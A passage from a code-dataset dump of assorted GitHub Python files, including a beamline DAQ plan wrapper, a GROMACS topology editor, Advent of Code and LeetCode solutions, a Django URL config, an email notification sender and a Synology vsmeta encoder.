that you'd like the daq\n to run along with. This also stages the DAQ so that the run start/stop\n will be synchronized with the bluesky runs.\n\n Note that this is not a calib cycle scan. See\n `daq_step_scan_wrapper` and `daq_step_scan_decorator`\n for the calib cycle variant.\n\n All configuration must be done by supplying config kwargs to this wrapper.\n\n This must be applied outside the run_wrapper.\n\n The `daq_during_decorator` is the same as the\n `daq_during_wrapper`, but it is meant to be used as a function\n decorator.\n\n Internally, this uses the flyer interface of the `pcdsdaq.daq.Daq`\n object.\n\n Parameters\n ----------\n plan : plan\n A bluesky plan that yields bluesky Msg objects.\n\n record : bool, optional\n Whether or not to record the run in the DAQ. Defaults to True because\n we don't want to accidentally skip recording good runs.\n\n use_l3t : bool, optional\n Whether or not the use the l3t filter for the events argument. Defaults\n to False to avoid confusion from unconfigured filters.\n\n controls : list of positioners or signals, optional\n If provided, values from these will make it into the DAQ data\n stream as variables. For this purpose, the ``.position`` and\n ``.value`` attributes will be checked, followed by the ``.get()``\n method.\n\n Returns\n -------\n daq_during_plan : plan\n The same plan as before, but modified appropriately to run the DAQ at\n the same time.\n \"\"\"\n daq = _get_daq()\n\n @bpp.stage_decorator([daq])\n def daq_during_plan():\n yield from bps.configure(daq, events=0, record=record,\n use_l3t=use_l3t, controls=controls)\n return (yield from bpp.fly_during_wrapper(plan, flyers=[daq]))\n\n return (yield from daq_during_plan())\n\n\ndef step_size_decorator(plan):\n \"\"\"\n Grab the last argument (number of steps), and intepret as\n - step size if float\n - number of steps if integer\n\n Only works on step scans in one dimension.\n\n Parameters\n ----------\n plan : plan\n A bluesky plan that yields bluesky Msg objects. 
Must be\n a scan in one dimension, with the last argument being\n the number of scan points / step size.\n\n Returns\n -------\n step_size_plan : plan\n The same plan as before, but modified appropriately to\n differentiate between step size and number of steps.\n This will be a callable generator function.\n \"\"\"\n\n @wraps(plan)\n def inner(*args, **kwargs):\n if 'num' in kwargs:\n # Currently unneeded, since daq_ascan and daq_dscan\n # do not support num kwarg\n n = kwargs.pop('num')\n else:\n # assumes (det_list, motor, start, stop, num)\n det_list, motor, start, stop, n = args\n\n if not isinstance(n, (numbers.Integral, numbers.Real)):\n raise TypeError(\"Step size / number of steps is \"\n \"neither float nor integer.\")\n\n if isinstance(n, numbers.Integral):\n # interpret as number of steps (default)\n result = yield from plan(*args, **kwargs)\n elif isinstance(n, numbers.Real):\n # correct step size sign\n n = np.sign(stop - start) * np.abs(n)\n if np.abs(n) > np.abs(stop - start):\n raise ValueError(f\"Step size provided {n} greater \"\n \"than the range provided \"\n f\"{np.abs(stop - start)}.\")\n step_list = utils.orange(start, stop, n)\n n_steps = len(step_list)\n\n if n_steps == 0:\n raise ValueError(\"Number of steps is 0 with the \"\n \"provided range and step size.\")\n\n result = yield from plan(det_list, motor, start,\n step_list[-1], n_steps,\n **kwargs)\n\n return result\n\n return inner\n\n\ndaq_during_decorator = make_decorator(daq_during_wrapper)\n","repo_name":"pcdshub/nabs","sub_path":"nabs/preprocessors.py","file_name":"preprocessors.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20337122199","text":"import re\nimport sys\n# Writing to file\n#file1 = open('processed.top', 'w')\n\nprint ('Number of arguments:', len(sys.argv), 'arguments.')\nprint ('Argument List:', str(sys.argv))\nprint(\"Arguments passed:\", end = \" \")\nfor i in range(1, len(sys.argv)):\n print(sys.argv[i], end = \" \")\n\nif (len(sys.argv) < 2):\n\tprint ('\\nUsage: appendUnderscoreToSolute.py your_topology_file.top soluteMolecule1 soluteMolecule2 ...')\n\tsys.exit(1)\n\ndotTop = '.top'\nif(dotTop not in sys.argv[1]):\n\tprint ('\\nUsage: appendUnderscoreToSolute.py your_topology_file.top soluteMolecule1 soluteMolecule2 ...')\n\tsys.exit(1)\n\ninputfilename = sys.argv[1]\noutputfilename = sys.argv[1][:-4] + '_.top'\nprint(\"outputfilename: \", outputfilename)\nwith open(inputfilename) as inf:\n content = inf.readlines()\n\ninf.close()\n\nblank=''\natomTypeHeader = '[ moleculetype ]'\n#\\n; Name nrexcl\\n'\n\nprint(\"File length: \",len(content))\nenteredAtomSection = False\n\nmoleculeToScale = ''\nblank = '\\n'\natoms = \"[ atoms ]\"\nbonds = \"[ bonds ]\"\nlistOfFirstAndLastIndices = []\nfirstLineOfAtoms = 0\nlastLineOfAtoms = 0\nenteredAtomSection = False\ncounterOfMoleculesAppended = 0\nlistOfMoleculesAppended = []\n# Get (start, end) tuples of atom section of solute molecules\nfor i in range(2, len(sys.argv)):\n\tprint(\"Scaling \", sys.argv[i])\n\tmoleculeToScale = sys.argv[i]\n\n\tfor j in range(0, len(content)):\n\t\tif moleculeToScale in content[j]: \n\t\t\tif content[j+1] is blank and atoms in content[j+2]:\n\t\t\t\tfirstLineOfAtoms = j + 5\n\t\t\t\tenteredAtomSection = True\n\t\tif enteredAtomSection and bonds in content[j]:\n\t\t\tlastLineOfAtoms = j - 2\n\t\t\ttemp = (firstLineOfAtoms, 
lastLineOfAtoms)\n\t\t\tlistOfFirstAndLastIndices.append(temp)\n\t\t\tenteredAtomSection = False\n\t\t\tcounterOfMoleculesAppended = counterOfMoleculesAppended + 1\n\t\t\tlistOfMoleculesAppended.append(moleculeToScale)\n\n# Replace character immediately following atom name with a '_'\nif (counterOfMoleculesAppended != len(sys.argv) - 2):\n\tprint(\"Couldn't find all molecules!\")\n\tprint(\"I only found : \", listOfMoleculesAppended)\n\tprint(\"Terminating without appending the underscore.\")\n\tprint(\"Correct your arguments or topology file!\")\n\tsys.exit(1)\n\nindex = 17\nprint(\"Tuples of (start, stop) of atom sections: \",listOfFirstAndLastIndices)\nfor a_tuple in listOfFirstAndLastIndices:\n\tfor i in range(a_tuple[0], a_tuple[1]+1):\n\t\tif(content[i][0] != ';'):\n\t\t\tcontent[i] = content[i][:index] + '_' + content[i][index + 1:]\n\nof = open(outputfilename, \"w\")\nof.writelines(content)\nof.close()\nprint(\"\\nAppended an underscore to all atoms in the molecules you provided!\")\nprint('\\x1b[6;30;42m' + 'Success!' + '\\x1b[0m')\n\n","repo_name":"GregorySchwing/hremd-idp","sub_path":"hremd-inputs/mycmax/2_hremd_setup/appendUnderscoreToSolute.py","file_name":"appendUnderscoreToSolute.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
{"seq_id":"4511717703","text":"import numpy as np\n\nfrom functools import reduce\nfrom math import inf\nfrom sympy.ntheory.modular import solve_congruence\n\nwith open(\"input\") as f:\n    t, busses = [line.strip() for line in f.readlines()]\n    t = int(t)\n    busses = busses.split(',')\n\n# part I\nbusses_active = [int(b) for b in busses if b.isdigit()]\nW = np.array([[bus, bus - t % bus] for bus in busses_active])\nearliest = np.argmin(W, 0)[1]\nprint(np.prod(W[earliest]))\n\n# part II // Chinese Remainder Theorem\na = [int(b) - i for i, b in enumerate(busses) if b.isdigit()]\nprint(solve_congruence(*list(zip(a, busses_active)))[0])\n","repo_name":"madsthoisen/advent_of_code","sub_path":"2020/dec13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"21352855437","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nCheck whether an array is the preorder traversal of a binary search tree; return True if it is, otherwise False\n'''\n# Binary search tree: the left subtree is smaller than the root, the right subtree is larger than the root\n# Preorder traversal: root -> left child -> right child\ndef f(lst):\n    root = float('-inf')\n    stack = []\n    for v in lst:\n        # if right son < root -> False\n        if v < root:\n            return False\n        while len(stack) > 0 and stack[-1] < v:\n            # v becomes a right child\n            root = stack.pop() # pop the stack top to serve as the root\n        stack.append(v)\n    return True\n\nlst = [5, 3, 2, 4, 6]\nprint(f(lst))\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"tree/verify_preorder_of_BST.py","file_name":"verify_preorder_of_BST.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"}
{"seq_id":"38590240938","text":"import pandas as pd\n\ndata = {\n    \"country\": [\"china\", \"japan\", \"korea\", \"usa\"],\n    \"gdp\": [1409250000, 516700000, 169320000, 2041280000],\n    \"population\": [141500, 12718, 5180, 32676],\n}\n\ncountry = pd.DataFrame(data)\ncountry = country.set_index(\"country\")\n\nprint(country.shape) # (4, 2)\nprint(country.size) # 8\nprint(country.ndim) # 2\nprint(country.values)\n\ncountry.index.name = \"Country\"\ncountry.columns.name = \"Info\"\n\nprint(country.index)\n# Index(['china', 'japan', 'korea', 'usa'], dtype='object',
name='Country')\nprint(country.columns)\n# Index(['gdp', 'population'], dtype='object', name='Info')\n","repo_name":"beomjunlim/Python_Udemy","sub_path":"pandas.py","file_name":"pandas.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12405366723","text":"import argparse\nimport sys\n\nfrom models.fetcher import EpisodeFetcher\nfrom models.tvdb import TVDBAPI\n\n\nconfig_fp = \"config.ini\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--add-series\", help=\"Search string of Series name to add\")\nparser.add_argument(\"--add-eps\", action=\"store_true\",\n help=\"Add new episodes\")\nparser.add_argument(\"--series-ids\", nargs=\"*\", type=int,\n help=\"Limit to series_ids\")\nparser.add_argument(\"--download\", action=\"store_true\",\n help=\"Add torrents and initiate tranfer, limit to only --series-ids if desired\")\nparser.add_argument(\"--pause-transfer\", action=\"store_true\",\n help=\"Do not immediately start torrent transfers\")\nparser.add_argument(\"--status\", action=\"store_true\",\n help=\"Check for any completed transfers and process them\")\nparser.add_argument(\"--view-series\", help=\"View added series info\",\n action=\"store_true\")\nparser.add_argument(\n \"--shortened-searches\",\n help=\"Search for episodes using a shortened episode name\",\n action=\"store_true\",\n)\n\n\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n fetcher = EpisodeFetcher(\n config_fp,\n shortened_searches=args.shortened_searches\n )\n if args.view_series:\n api = TVDBAPI(config_fp)\n api.view_all_series()\n sys.exit(0)\n\n if args.series_ids is None:\n series_ids = []\n\n if args.add_series or args.add_eps:\n api = TVDBAPI(config_fp)\n api.login()\n\n if args.add_series:\n api.search_and_add_new_series(args.add_series)\n if args.add_eps:\n api.add_series_episodes(series_ids=args.series_ids)\n\n if args.download:\n fetcher.download_all_non_complete_episodes(\n series_ids=args.series_ids,\n pause_transfer=args.pause_transfer\n )\n if args.status:\n fetcher.check_downloading_torrents()\n\n","repo_name":"wallawaz/torrent_automator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42718597388","text":"class Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n strs.sort()\n \n ans =\"\"\n \n for i in range(min(len(strs[-1]), len(strs[0]))):\n if strs[0][i] == strs[-1][i]:\n ans += strs[0][i]\n \n else:\n break\n \n return ans","repo_name":"vinhocent/leetcode","sub_path":"0014-longest-common-prefix/0014-longest-common-prefix.py","file_name":"0014-longest-common-prefix.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38424975408","text":"class Course:\n \"\"\"课程\"\"\"\n\n def __init__(self, course_name, course_id, credit, instructor_name, address, description):\n self.__course_name = course_name\n self.__course_id = course_id\n self.__credit = credit\n self.__instructor_name = instructor_name\n self.__address = address\n self.__description = description\n\n def get_course_name(self):\n return self.__course_name\n\n def __str__(self):\n string = 'Course_name:' + self.__course_name + '\\n'\n string += 'Course_id:' + self.__course_id + '\\n'\n string += 'Credit:' + self.__credit + '\\n'\n string += 
'Instructor_name:' + self.__instructor_name + '\\n'\n string += 'Address:' + self.__address + '\\n'\n string += 'Description:' + self.__description + '\\n'\n return string\n\n\nif __name__ == '__main__':\n fi = open('course.txt', 'r')\n course_list = [] # 课程对象列表\n while True:\n line1 = fi.readline().strip() # 读取1行\n if line1 == '':\n break\n line2 = fi.readline().strip() # 读取1行\n tem_list = line1.split(sep=\",\")\n course_list.append(\n Course(tem_list[0], tem_list[1], tem_list[2], tem_list[3], tem_list[4], line2)) # 将实例化的课程对象添加到课程对象列表中\n fi.close()\n\n # 打印保存的课程对象数组\n for course in course_list:\n print(course)\n","repo_name":"singi2016cn/free_coding","sub_path":"baidu/python的文档导入和属性问题/course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4656157249","text":"import filecmp\nimport os\nimport unittest\n\nfrom quatradis.tisp.generator.from_values import PlotFromValuesGenerator\nfrom quatradis.tisp.parser import PlotParser\n\ndata_dir = os.path.join('data', 'tisp', 'create')\n\n\nclass TestPlotGenerator(unittest.TestCase):\n\n def test_forward_only(self):\n filename = os.path.join(data_dir, 'test_plotgen')\n p = PlotFromValuesGenerator([0, 0, 0, 0, 0, 1, 1, 3], [], filename)\n self.assertTrue(p.construct_file())\n\n self.assertTrue(os.path.exists(filename))\n self.assertTrue(filecmp.cmp(os.path.join(data_dir, 'expected_plotgen'), filename))\n os.remove(filename)\n\n def test_generate_and_read(self):\n filename = os.path.join(data_dir, 'plot.test')\n p = PlotFromValuesGenerator([0, 0, 0, 0, 0, 1, 1, 3], [9, 9, 0, 9, 9, 1, 1, 3], filename)\n p.construct_file()\n\n d = PlotParser(filename, 0)\n self.assertTrue(self.check_arrays_equal(d.forward, [0, 0, 0, 0, 0, 1, 1, 3]))\n self.assertTrue(self.check_arrays_equal(d.reverse, [9, 9, 0, 9, 9, 1, 1, 3]))\n self.assertTrue(self.check_arrays_equal(d.combined, [9, 9, 0, 9, 9, 2, 2, 6]))\n\n os.remove(filename)\n\n def check_arrays_equal(self, array1, array2):\n for i, val in enumerate(array1):\n if array1[i] != array2[i]:\n print(str(array1[i]) + \" not equal to \" + str(array2[i]))\n return False\n return True\n","repo_name":"quadram-institute-bioscience/QuaTradis","sub_path":"tests/py/tisp/generator/from_values_test.py","file_name":"from_values_test.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72705995369","text":"import numpy as np\n\nfrom matplotlib.patches import Circle, Wedge, Polygon\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.widgets import LassoSelector\n\ndef centerpoint_listener(iss, pointlist):\n def onclick_centerpoints(event):\n xi, yi = int(event.xdata + 0.5), int(event.ydata + 0.5)\n zi = iss.idx[0]\n # print('button=%d, x=%d, y=%d, xdata=%f, ydata=%f' % (event.button, event.x, event.y, event.xdata, event.ydata))\n print(zi, yi, xi)\n if event.key=='c':\n print('added! 
', event.key)\n pointlist.append([zi,yi,xi])\n cid = iss.fig.canvas.mpl_connect('button_press_event', onclick_centerpoints)\n return cid\n # return onclick_centerpoints\n\ndef centerpoints2slices(img, pointlist, dx=128):\n slices = []\n for pt in pointlist:\n img2 = img[pt[0]]\n img2 = np.pad(img2, dx, mode='reflect')\n sl = slice(pt[1], pt[1]+2*dx), slice(pt[2], pt[2]+2*dx)\n slices.append(img2[sl])\n return np.array(slices)\n\ndef lasso_randomPolygons(ax, polylist):\n def onselect(verts):\n p = Polygon(verts, fc=(random(), random(), random(), 0.25), rasterized=True)\n ax.add_patch(p)\n polylist.append(p)\n # mask = nxutils.points_inside_poly\n lasso = LassoSelector(ax, onselect)\n return lasso\n\ndef lasso_draw(ax, mask):\n def onselect(verts):\n # p = Polygon(verts, fc=(random(), random(), random(), 0.25), rasterized=True)\n # ax.add_patch(p)\n verts = np.array(verts, dtype=np.int)\n mask[verts[:,0], verts[:,1]] = mask.max() + 1\n # mask = nxutils.points_inside_poly\n lasso = LassoSelector(ax, onselect)\n return lasso\n\n","repo_name":"mpicbg-csbd/detsegtra","sub_path":"segtools/annotation.py","file_name":"annotation.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2274727259","text":"# https://adventofcode.com/2021/day/17\n\nimport re\nfrom collections import namedtuple, deque\nfrom itertools import product\nfrom pathlib import Path\n\n\nPosition = namedtuple(\"Position\", \"x y\")\nTarget = namedtuple(\"Target\", \"xmin xmax ymin ymax\")\n\n\ndef load_data(path):\n with open(path) as fd:\n coords = [int(coord) for coord in re.findall(r\"-?\\d+\", fd.read())]\n return Target(*coords)\n\n\ndef launch_probe(vx, vy):\n position = Position(0, 0)\n while True:\n yield position\n position = Position(position.x + vx, position.y + vy)\n vx, vy = max(0, vx - 1), vy - 1\n\n\ndef is_hit(vx, vy, target):\n for position in launch_probe(vx, vy):\n if target.xmin <= position.x <= target.xmax and target.ymin <= position.y <= target.ymax:\n return True\n elif position.x > target.xmax or position.y < target.ymin:\n return False\n\n\ndef get_acc_vy_range(vx, vy_init, target):\n vy_range = deque()\n for vy in range(vy_init, -target.ymin + 1):\n if is_hit(vx, vy, target):\n vy_range.appendleft(vy)\n return vy_range\n\n\ndef get_acc_velocities(target):\n acc_velocities = []\n for vx in range(0, target.xmax + 1):\n for vy in range(target.ymin, -target.ymin):\n if is_hit(vx, vy, target):\n acc_velocities.append((vx, vy))\n return acc_velocities\n\n\ndef part_one(data):\n return data.ymin * (data.ymin + 1) // 2\n\n\ndef part_two(data):\n velocities = get_acc_velocities(data)\n return len(velocities)\n\n\nif __name__ == \"__main__\":\n input_dir = Path().resolve().parent / \"inputs/17\"\n samples = load_data(input_dir / \"samples.in\")\n data = load_data(input_dir / \"data.in\")\n\n assert part_one(samples) == 45\n assert part_two(samples) == 112\n\n print(part_one(data))\n print(part_two(data))\n","repo_name":"koczanm/advent-of-code","sub_path":"2021/python/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29582568912","text":"from apps.log_databus.handlers.collector_scenario.base import CollectorScenario\nfrom django.utils.translation import ugettext as _\n\n\nclass CustomCollectorScenario(CollectorScenario):\n @classmethod\n def get_built_in_config(cls, 
es_version=\"5.X\"):\n \"\"\"\n 获取采集器标准字段\n \"\"\"\n return {\n \"option\": {\n \"es_unique_field_list\": [\"cloudId\", \"serverIp\", \"path\", \"gseIndex\", \"iterationIndex\"],\n \"separator_node_source\": \"\",\n \"separator_node_action\": \"\",\n \"separator_node_name\": \"\",\n },\n \"fields\": [\n {\n \"field_name\": \"__ext\",\n \"field_type\": \"object\",\n \"tag\": \"dimension\",\n \"alias_name\": \"ext\",\n \"description\": _(\"额外信息字段\"),\n \"option\": {\"es_type\": \"object\", \"es_include_in_all\": False}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"object\"},\n },\n {\n \"field_name\": \"cloudId\",\n \"field_type\": \"float\",\n \"tag\": \"dimension\",\n \"alias_name\": \"cloudid\",\n \"description\": _(\"云区域ID\"),\n \"option\": {\"es_type\": \"integer\", \"es_include_in_all\": False}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"integer\"},\n },\n {\n \"field_name\": \"serverIp\",\n \"field_type\": \"string\",\n \"tag\": \"dimension\",\n \"alias_name\": \"ip\",\n \"description\": \"ip\",\n \"option\": {\"es_type\": \"keyword\", \"es_include_in_all\": True}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"keyword\"},\n },\n {\n \"field_name\": \"path\",\n \"field_type\": \"string\",\n \"tag\": \"dimension\",\n \"alias_name\": \"filename\",\n \"description\": _(\"日志路径\"),\n \"option\": {\"es_type\": \"keyword\", \"es_include_in_all\": True}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"keyword\"},\n },\n {\n \"field_name\": \"gseIndex\",\n \"field_type\": \"float\",\n \"tag\": \"dimension\",\n \"alias_name\": \"gseindex\",\n \"description\": _(\"gse索引\"),\n \"option\": {\"es_type\": \"long\", \"es_include_in_all\": False}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"long\"},\n },\n {\n \"field_name\": \"iterationIndex\",\n \"field_type\": \"float\",\n \"tag\": \"dimension\",\n \"alias_name\": \"iterationindex\",\n \"description\": _(\"迭代ID\"),\n \"flat_field\": True,\n \"option\": {\"es_type\": \"integer\", \"es_include_in_all\": False}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"integer\"},\n },\n ],\n \"time_field\": {\n \"field_name\": \"dtEventTimeStamp\",\n \"field_type\": \"timestamp\",\n \"tag\": \"dimension\",\n \"alias_name\": \"utctime\",\n \"description\": _(\"数据时间\"),\n \"option\": {\n \"es_type\": \"date\",\n \"es_include_in_all\": False,\n \"es_format\": \"epoch_millis\",\n \"time_format\": \"yyyy-MM-dd HH:mm:ss\",\n \"time_zone\": 0,\n }\n if es_version.startswith(\"5.\")\n else {\n \"es_type\": \"date\",\n \"es_format\": \"epoch_millis\",\n \"time_format\": \"yyyy-MM-dd HH:mm:ss\",\n \"time_zone\": 0,\n },\n },\n }\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_databus/handlers/collector_scenario/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"32594521456","text":"\"\"\"Added fields to sessions\n\nRevision ID: 2d53a67e4d71\nRevises: ea4c6f39f70f\nCreate Date: 2020-03-24 17:15:10.895056\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2d53a67e4d71'\ndown_revision = 'ea4c6f39f70f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('sessions', sa.Column('session_end', sa.DateTime(), nullable=True))\n op.add_column('sessions', sa.Column('session_start', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('sessions', 'session_start')\n op.drop_column('sessions', 'session_end')\n # ### end Alembic commands ###\n","repo_name":"Dakhaas-HU/recommendation-engine","sub_path":"alembic/versions/2d53a67e4d71_added_fields_to_sessions.py","file_name":"2d53a67e4d71_added_fields_to_sessions.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6958660097","text":"from django.urls import path, include\nfrom django.contrib import admin\nfrom django.urls import path\n# from djoser.views import UserViewSet\nfrom rest_framework.routers import DefaultRouter\nfrom calendars.urls import router as calendarrouter\nfrom accounts.urls import router as accountsrouter\n\nrouter = DefaultRouter()\n\nrouter.registry.extend(calendarrouter.registry)\nrouter.registry.extend(accountsrouter.registry)\n# router.register('users', UserViewSet, basename=\"users\")\n\n\ndef is_route_selected(url_pattern):\n \"\"\"Add routes here..\"\"\"\n\n urls = [\n \"users/set_username/\",\n \"users/set_email/\",\n \"users/reset_email_confirm/\",\n ]\n for u in urls:\n match = url_pattern.resolve(u)\n if match:\n return False\n return True\n\n\n# Filter router URLs removing unwanted ones\nselected_user_routes = list(filter(is_route_selected, router.urls))\n\nurlpatterns = [\n path('', include(router.urls)),\n path('admin/', admin.site.urls),\n path('calendars/', include('calendars.urls')),\n path('accounts/', include('accounts.urls')),\n]\n# + selected_user_routes\n","repo_name":"dnmac/django-rest-calendar-djoser","sub_path":"project/project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8630411775","text":"import smtplib, ssl\nfrom config import sender_email, receiver_email, password\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.header import Header\n\n\ndef send_message(type, email, phone='', name='', text=''):\n\tport = 465 # для SSL подключения\n\tsmtp_server = \"smtp.gmail.com\"\n\t\n\tmsg = MIMEMultipart('alternative')\n\tmsg.set_charset('utf8')\n\tmsg['FROM'] = sender_email\n\tmsg['To'] = receiver_email\n\n\tif type == 'bid':\n\t\tbody = '''\n\t\t\tEmail: {0}
\n\t\t\tPhone: {1}<br>\n\t\t\tName: {2}<br>\n\t\t\t<br><br>Message<br><br><br><br>\n\t\t\t{3}\n\t\t'''.format(email, phone, name, text)\r\n\t\tmsg['Subject'] = Header('New bid!'.encode('utf-8'),\r\n\t\t 'UTF-8'\r\n\t\t).encode()\r\n\telif type == 'subscribe':\r\n\t\ttext = 'This person has subscribed to newsletter.'\r\n\t\tbody = '''\n\t\t\tEmail: {0}<br>\n\t\t\t<br><br>{1}<br><br><br>
\n\t\t'''.format(email, text)\n\t\tmsg['Subject'] = Header('New subscriber!'.encode('utf-8'),\n\t\t 'UTF-8'\n\t\t).encode()\n\t\tmsg['To'] = receiver_email\n\t_attach = MIMEText(body.encode('utf-8'), 'html', 'UTF-8') \n\tmsg.attach(_attach)\t\n\n\tcontext = ssl.create_default_context()\n\twith smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n\t\tserver.login(sender_email, password)\n\t\tmsg.attach(_attach)\n\t\tserver.sendmail(sender_email, receiver_email, msg.as_string())\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"E6YJI6EK/tour-plan","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21658081715","text":"# Problem Link : https://leetcode.com/problems/count-square-submatrices-with-all-ones/\n\n\nclass Solution:\n def countSquares(self, matrix: List[List[int]]) -> int:\n s = sum(matrix[0])\n for i in range(1, len(matrix)):\n for j in range(1, len(matrix[0])):\n if matrix[i][j] == 1:\n matrix[i][j] = min(matrix[i-1][j], matrix[i-1][j-1], matrix[i][j-1])+1\n s += sum(matrix[i])\n return s\n","repo_name":"vidhikhathuria/MayLeetcodeChallenge","sub_path":"leetcode0307.py","file_name":"leetcode0307.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3425385449","text":"import base64\nimport hashlib\nimport time\nimport bitstring\n\n\ndef trim(string: str, limit: int):\n ''' Trim string to fit upperlimit\n\n '''\n ret = string\n while len(ret.encode(\"utf-8\")) > limit:\n ret = ret[:-1]\n return ret\n\n\ndef int2bytes(integer: int):\n ''' Encode integer as bytes with vsmeta format\n\n eg: 128 => b'0x8001'\n 127 => b'0x7f'\n '''\n bs = bitstring.BitStream()\n while integer >= 128:\n # Mark highest digit of uint8 with 0x80\n bs.append(((integer % 128) | 0x80).to_bytes(1, 'little'))\n integer = integer >> 7\n bs.append(integer.to_bytes(1, 'little'))\n return bs.bytes\n\n\ndef str2bytes(string: str):\n ''' Encode string as bytes with vsmeta format\n\n bytes: [toBytes(len), string]\n '''\n bs = bitstring.BitStream()\n bs.append(int2bytes(len(string.encode(\"utf-8\"))))\n bs.append(string.encode(\"utf-8\"))\n return bs.bytes\n\n\ndef img2bytes(image: bytes):\n ''' Encode image as bytes with vsmeta format\n\n bytes: str2bytes(base64 + \\\\n every 76 chars)\n '''\n b64_bytes = base64.b64encode(image)\n\n out_str = ''\n count = 0\n for chr in b64_bytes.decode():\n if count == 76:\n count = 0\n out_str += '\\n'\n out_str += chr\n count += 1\n bs = bitstring.BitStream()\n bs.append(str2bytes(out_str))\n return bs.bytes\n\nclass VSMETAEncoder:\n\n TAG_FILE_HEADER_MOVIE = b'\\x08\\x01'\n\n TAG_SHOW_TITLE = b'\\x12'\n TAG_SHOW_TITLE2 = b'\\x1A'\n TAG_EPISODE_TITLE = b'\\x22'\n TAG_YEAR = b'\\x28'\n TAG_EPISODE_RELEASE_DATE = b'\\x32'\n TAG_EPISODE_LOCKED = b'\\x38'\n TAG_CHAPTER_SUMMARY = b'\\x42'\n TAG_EPISODE_META_JSON = b'\\x4A'\n TAG_GROUP1 = b'\\x52'\n TAG_CLASSIFICATION = b'\\x5A'\n TAG_RATING = b'\\x60'\n TAG_EPISODE_THUMB_DATA = b'\\x8a'\n TAG_EPISODE_THUMB_MD5 = b'\\x92'\n TAG_GROUP2 = b'\\xAA'\n\n TAG1_CAST = b'\\x0A'\n TAG1_DIRECTOR = b'\\x12'\n TAG1_GENRE = b'\\x1A'\n TAG1_WRITER = b'\\x22'\n\n TAG2_BACKDROP_DATA = b'\\x0a'\n TAG2_BACKDROP_MD5 = b'\\x12'\n TAG2_TIMESTAMP = b'\\x18'\n\n ext = \".vsmeta\"\n\n def __init__(self):\n pass\n\n def encode(self, video: dict):\n ''' encode video info as vsmeta format\n\n return bytes that encode using 
